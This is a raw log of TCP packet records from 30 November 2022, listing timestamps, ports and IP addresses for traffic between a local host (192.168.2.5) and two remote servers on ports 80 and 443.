Nov 30, 2022 00:22:31.972141981 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972157955 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972163916 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972177982 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972183943 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972201109 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972203016 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972220898 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972223997 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972239971 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972244978 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972259998 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972265005 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972284079 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972284079 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972300053 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972302914 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972321033 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972325087 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972342014 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972347021 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972361088 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972383976 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972409964 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972429991 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972450018 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972469091 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972472906 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972489119 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972505093 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972507954 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972526073 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972527981 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972548008 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972553968 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972568035 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972570896 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972589016 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972639084 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.973076105 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973095894 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973115921 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973135948 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973169088 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.973176956 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973197937 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973203897 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.973218918 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973236084 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.973238945 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973258972 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973264933 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.973297119 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.973495007 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973515034 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973532915 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973551989 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973561049 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.973572016 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973578930 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.973592043 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973607063 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.973609924 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973630905 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973637104 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.973663092 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.973683119 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.973826885 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973848104 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973866940 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973886967 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973906040 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973912001 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.973948002 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.973948956 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973969936 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.973988056 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.974005938 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.974014044 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.974028111 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.974045038 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.974054098 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.974071026 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.974098921 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.974670887 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.974729061 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.974783897 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.974838972 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.974858046 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.974867105 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.974905968 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.974905968 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.974936008 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.974956989 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.974977970 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.974992037 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975009918 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975027084 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.975045919 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975065947 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.975065947 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975085974 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975089073 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.975115061 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.975131035 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.975132942 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975167036 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975184917 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975203037 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975209951 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.975223064 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975236893 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.975258112 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975264072 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.975279093 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975297928 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975316048 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975333929 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975337029 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.975353956 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975354910 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.975374937 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975387096 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.975394011 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975414038 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975418091 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.975433111 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.975435019 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975455046 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975474119 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975478888 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.975493908 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975507975 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.975512981 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.975523949 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.975559950 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.981935978 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.981975079 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.981998920 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.982017994 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.982037067 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.982054949 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.982059002 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.982074022 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.982094049 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.982106924 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.982125044 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.982152939 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.983191967 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.983212948 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.983232975 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.983266115 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.983292103 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.984533072 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.984555006 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.984575987 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.984595060 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.984603882 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.984615088 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.984625101 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.984636068 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.984654903 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.984656096 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.984678030 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.984684944 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.984704971 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.984709978 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.984721899 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.984743118 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.984759092 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.984786987 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.984847069 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.984867096 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.984885931 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.984899998 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.984906912 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.984929085 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.984929085 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.984947920 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.984957933 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.984967947 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.984982967 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.984987974 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.985004902 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.985008001 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.985029936 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.985044003 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.985049963 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.985068083 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.985070944 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.985091925 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.985095024 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.985126019 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.985158920 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.985852957 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.985873938 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.985891104 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.985971928 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.987107992 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.987129927 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.987153053 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.987176895 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.987185001 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.987193108 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.987204075 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.987212896 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.987227917 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.987243891 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.987248898 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.987282991 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.987313032 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.987519979 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.987541914 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.987562895 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.987581968 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.987601042 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.987601042 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.987621069 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.987638950 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.987649918 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.987649918 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.987658024 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.987678051 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.987689972 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.987696886 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.987718105 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.987723112 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.987737894 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.987746000 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.987787962 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.988647938 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.988675117 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.988701105 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.988715887 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.988728046 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.988732100 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.988753080 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.988754034 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.988773108 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.988796949 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.988892078 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.988919020 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.988941908 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.988949060 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.988969088 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.988971949 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.988991022 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.988995075 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989012003 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.989020109 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989043951 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989054918 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.989069939 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989078999 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.989094973 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989098072 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.989115000 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.989120960 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989135027 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.989145994 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989167929 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.989170074 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989196062 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.989216089 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.989244938 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989273071 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989298105 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989319086 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.989320040 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989345074 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989345074 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.989362955 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989382029 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989399910 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989415884 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989434958 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989459038 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989476919 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989500999 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989514112 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.989525080 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.989552021 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.989572048 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:32.036386967 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:32.037746906 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:35.380665064 CET	49711	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:35.380781889 CET	443	49711	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:35.380934954 CET	49711	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:35.508810043 CET	49711	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:35.508845091 CET	443	49711	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:35.580975056 CET	443	49711	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:35.581096888 CET	49711	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:36.008974075 CET	49711	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:36.009028912 CET	443	49711	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:36.009402037 CET	443	49711	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:36.009665966 CET	49711	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:36.155205965 CET	49711	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:36.155251980 CET	443	49711	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:36.199083090 CET	443	49711	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:36.199198008 CET	443	49711	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:36.199383020 CET	49711	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:36.256124020 CET	49711	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:36.256161928 CET	443	49711	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:37.663202047 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:37.663290977 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:37.703329086 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.703357935 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.703824997 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:37.703871012 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.704188108 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:37.743805885 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.743850946 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.743901014 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.744294882 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.744473934 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:37.748291969 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:37.784511089 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.784554005 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.784800053 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:37.784878969 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.784981966 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.785099030 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:37.785099030 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:37.785604954 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.785734892 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.785804033 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.785850048 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:37.788594007 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.824728966 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.824754000 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.824837923 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.825233936 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.825390100 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.825424910 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.825592041 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.825608015 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.825680017 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:37.825958967 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:38.596460104 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:38.596674919 CET	49710	80	192.168.2.5	88.198.94.71
